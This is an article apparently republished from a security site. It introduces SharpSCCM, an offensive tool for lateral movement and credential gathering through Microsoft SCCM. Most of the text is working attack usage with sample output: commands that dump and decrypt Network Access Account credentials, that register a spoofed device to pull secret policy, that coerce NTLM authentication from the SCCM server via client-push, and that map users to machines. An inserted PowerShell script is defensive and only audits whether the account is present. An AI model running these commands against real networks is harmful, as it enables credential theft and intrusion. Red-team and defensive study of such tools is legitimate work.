SharpSCCM: a powerful tool for lateral movement via SCCM
VSole2022-12-20 18:25:09
About SharpSCCM
SharpSCCM is a lateral movement and credential-gathering tool that leverages Microsoft Endpoint Configuration Manager (SCCM); it achieves lateral movement and credential gathering through access to the SCCM administration console GUI.
Features
1. Post-exploitation functionality, including lateral movement;
2. Request NTLM authentication from SCCM clients;
3. Gather Network Access Account (NAA) credentials;
4. Request and deobfuscate NAA credentials;
5. Abuse a newly discovered attack primitive to coerce NTLM authentication from SCCM servers.
Download
Researchers can clone the project source to a local machine with the following command:
git clone https://github.com/Mayyhem/SharpSCCM.git
Building the project
After cloning the source, open SharpSCCM.sln in Visual Studio and select a target, for example Release > x64.
Then build the solution (Ctrl + Shift + B).
A single SharpSCCM assembly containing the tool and all of its dependencies is produced in the output path:
.\SharpSCCM\bin\x64\Release\SharpSCCM_merged.exe
Command-line usage
Command syntax:
SharpSCCM.exe [command] [options]
Subcommands:
add      Add an object to another object
get      Query the specified object and display its contents
exec     Execute an application from the specified UNC path, or request NTLM authentication from a client device
invoke   Execute or invoke an action on the server
local    Interact with the local workstation/server
new      Create a new object on the server
remove   Delete an object from the server
Using the tool
Dump the NAA via WMI and decrypt it with the DPAPI master key:
SharpSCCM.exe local naa wmi
Sample output:
.\SharpSCCM.exe local naa wmi
 _______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | |
[*] Retrieving Network Access Account blobs via WMI
[+] Connecting to \\localhost\root\ccm\policy\Machine\ActualConfig
[+] Executing WQL query: SELECT * FROM CCM_NetworkAccessAccount
[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()
[*] Secret : DPAPI_SYSTEM
[*] full: <REDACTED>
[*] m/u : <REDACTED>
[*] SYSTEM master key cache:
{340f2212-5765-4e57-8931-070fadb401c2}:<REDACTED>
{3c58124e-ef4e-4841-900c-3183550720b3}:<REDACTED>
{226f00ce-7ab9-4fff-a7e0-665e7afb2785}:<REDACTED>
{6641ae28-12b2-4e79-abe4-2199ac0245b1}:<REDACTED>
[*] Triaging Network Access Account Credentials
Plaintext NAA Username : APERTURE\networkaccess
Plaintext NAA Password : <REDACTED>
Request the device policy and obtain the NAA credentials:
SharpSCCM.exe get naa -u <computer$> -p <password>
Sample output:
.\SharpSCCM.exe get naa -u chell$ -p <password>
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | |
[+] Connecting to \\localhost\root\ccm
[+] Executing WQL query: SELECT Name,CurrentManagementPoint FROM SMS_Authority
[+] Current management point: atlas.aperture.sci
[+] Site code: PS1
[+] Created "ConfigMgr Client Messaging" certificate in memory for device registration and signing/encrypting subsequent messages
[+] Wrote "ConfigMgr Client Messaging" certificate to My store for CurrentUser
[+] Discovering local properties for client registration request
[+] Modifying client registration request properties:
FQDN: CAVE-JOHNSON-PC.APERTURE
NetBIOS name: CAVE-JOHNSON-PC
Authenticating as: chell$
Site code: PS1
[+] Sending HTTP registration request to atlas.aperture.sci:80
[+] Received unique GUID for new device: GUID:A7FC423E-FF62-48B1-8A42-9447178D16C5
[+] Obtaining Full Machine policy assignment from atlas.aperture.sci PS1
[+] Found 43 policy assignments
[+] Found policy containing secrets:
ID: {096db290-7e52-41cb-839c-b8af87b82abf}
Flags: RequiresAuth, Secret, IntranetOnly, PersistWholePolicy
URL: http://<mp>/SMS_MP/.sms_pol?{096db290-7e52-41cb-839c-b8af87b82abf}.4_00
[+] Adding authentication headers to download request:
ClientToken: GUID:A7FC423E-FF62-48B1-8A42-9447178D16C5;2022-10-17T23:24:00Z;2
ClientTokenSignature: <REDACTED>
[+] Received encoded response from server for policy {096db290-7e52-41cb-839c-b8af87b82abf}
[+] Successfully decoded and decrypted secret policy
[+] Deleted "CN=ConfigMgr Client Messaging" certificate from My store for CurrentUser
[+] Encrypted NAA username: 89130000...<REDACTED>...6C006F00
[+] Encrypted NAA password: 89130000...<REDACTED>...8D3C0000
[+] Done! Encrypted NAA hex strings can be decrypted offline using the "DeobfuscateNAAString.exe <string>" command
..\..\..\DeobfuscateNAAString\Release\DeobfuscateNAAString.exe 89130000...<REDACTED>...06C006F00
Plaintext: APERTURE\networkaccess
..\..\..\DeobfuscateNAAString\Release\DeobfuscateNAAString.exe 89130000...<REDACTED>...8D3C0000
Plaintext: <REDACTED>
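The two NAA sections above show that the account is cached on every client in the root\ccm\policy\Machine\ActualConfig namespace (class CCM_NetworkAccessAccount) and that the site code and management point are readable from root\ccm (class SMS_Authority). The PowerShell audit below is an added example, not SharpSCCM's own code: run locally as an administrator, it reports only whether an NAA policy is present on the host, plus the site code and management point, so a fleet-wide inventory can find clients that still carry the account. The function name Get-NaaExposure and the Finding strings are this example's own, and the assumption that SMS_Authority.Name carries the site code as "SMS:<code>" is marked in a comment.

```powershell
# Added example (not SharpSCCM code): local audit for Network Access Account exposure.
# Run elevated on a host with the ConfigMgr client installed. It never reads or
# decrypts the secret; it only reports whether the NAA policy blob exists.
function Get-NaaExposure {
    [CmdletBinding()]
    param()

    $clientNs = 'root\ccm'                               # holds SMS_Authority
    $policyNs = 'root\ccm\policy\Machine\ActualConfig'   # holds CCM_NetworkAccessAccount

    $result = [ordered]@{
        ComputerName    = $env:COMPUTERNAME
        ClientPresent   = $false
        NaaConfigured   = $false
        SiteCode        = $null
        ManagementPoint = $null
        Finding         = $null
    }

    # Edge case: no ConfigMgr client (or no rights) -> root\ccm is missing and CIM throws.
    try {
        $authority = Get-CimInstance -Namespace $clientNs -ClassName SMS_Authority -ErrorAction Stop |
            Select-Object -First 1
    } catch {
        $result.Finding = "ConfigMgr client not installed or namespace unreadable: $($_.Exception.Message)"
        return [pscustomobject]$result
    }
    $result.ClientPresent = $true
    if ($authority) {
        # Assumption: Name is of the form "SMS:<sitecode>", e.g. "SMS:PS1".
        $result.SiteCode        = $authority.Name -replace '^SMS:', ''
        $result.ManagementPoint = $authority.CurrentManagementPoint
    }

    # The NAA class is only present in ActualConfig when an NAA policy was delivered,
    # so check for the class first, then for instances (Get-CimClass returns nothing
    # for an unknown class instead of throwing).
    $naaClass = Get-CimClass -Namespace $policyNs -ClassName CCM_NetworkAccessAccount -ErrorAction SilentlyContinue
    if ($naaClass) {
        $naa = @(Get-CimInstance -Namespace $policyNs -ClassName CCM_NetworkAccessAccount -ErrorAction SilentlyContinue)
        $result.NaaConfigured = ($naa.Count -gt 0)
    }

    $result.Finding = if ($result.NaaConfigured) {
        'NAA policy present: any local administrator on this host can recover the account; review whether it is still needed and what it can reach'
    } else {
        'No NAA policy cached on this client'
    }
    return [pscustomobject]$result
}

# Usage: run on each client and collect the returned objects centrally.
Get-NaaExposure | Format-List
```

The audit deliberately stops at presence: the page's own output shows that decryption requires SYSTEM and the DPAPI master keys, and a defender's inventory only needs to know which hosts still carry the account and which site they report to.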
Lateral movement: invoke client-push
Coerce the SCCM server into sending NTLM authentication to <target> over SMB:
SharpSCCM.exe <server> <sitecode> invoke client-push -t <target>
Coerce the SCCM server into sending NTLM authentication to <target> over HTTP:
SharpSCCM.exe <server> <sitecode> invoke client-push -t <target@port>
Sample output:
PS C:\Users\cave.johnson.APERTURE\SharpSCCM\bin\x64\Release> .\SharpSCCM.exe atlas ps1 invoke client-push -t 192.168.57.130
[+] Discovering local properties for client registration request
[+] Modifying client registration request properties
ClientFqdn: 192.168.57.130
NetBiosName: 192.168.57.130
SiteCode: ps1
[+] Registration Request Body:
<...snip...>
[+] Sending HTTP registration request to atlas:80
[+] Received unique GUID for new device: GUID:19B65F3B-AAD8-41C1-B4BE-E6917FA0B8BE
[+] Discovering local properties for DDR inventory report
[+] Modifying DDR and inventory report properties
[+] Discovered PlatformID: Microsoft Windows NT Server 10.0
[+] Modified PlatformID: Microsoft Windows NT Workstation 2010.0
[+] DDR Body:
<...snip...>
[+] Inventory Report Body:
<...snip...>
[+] Sending DDR from GUID:19B65F3B-AAD8-41C1-B4BE-E6917FA0B8BE to MP_DdrEndpoint endpoint on atlas:ps1 and requesting client installation on 192.168.57.130
Lateral movement: get primary-user
List the devices whose primary user is <username>:
SharpSCCM.exe <server> <sitecode> get primary-user -u <username>
Sample output:
.\SharpSCCM.exe atlas ps1 get primary-user -u chell
[+] Connecting to \\atlas\root\SMS\site_ps1
[+] Executing WQL query: SELECT * FROM SMS_UserMachineRelationship WHERE UniqueUserName LIKE '%chell%'
-----------------------------------
SMS_UserMachineRelationship
-----------------------------------
CreationTime: 20220528005101.523000+000
IsActive: True
RelationshipResourceID: 25165825
ResourceClientType: 1
ResourceID: 16777227
ResourceName: GLADOS
Sources: 2
Types: 1
UniqueUserName: aperture\chell
-----------------------------------
License
This project is developed and released under the GPL-3.0 open-source license.
Project link
SharpSCCM: https://github.com/Mayyhem/SharpSCCM
References:
https://enigma0x3.net/2016/02/29/offensive-operations-with-powersccm/
https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867
https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9
https://blog.xpnsec.com/unobfuscating-network-access-accounts/
https://posts.specterops.io/coercing-ntlm-authentication-from-sccm-e6e23ea8260a
https://docs.microsoft.com/en-us/mem/configmgr/core/clients/deploy/plan/security-and-privacy-for-clients
VSole
Network security expert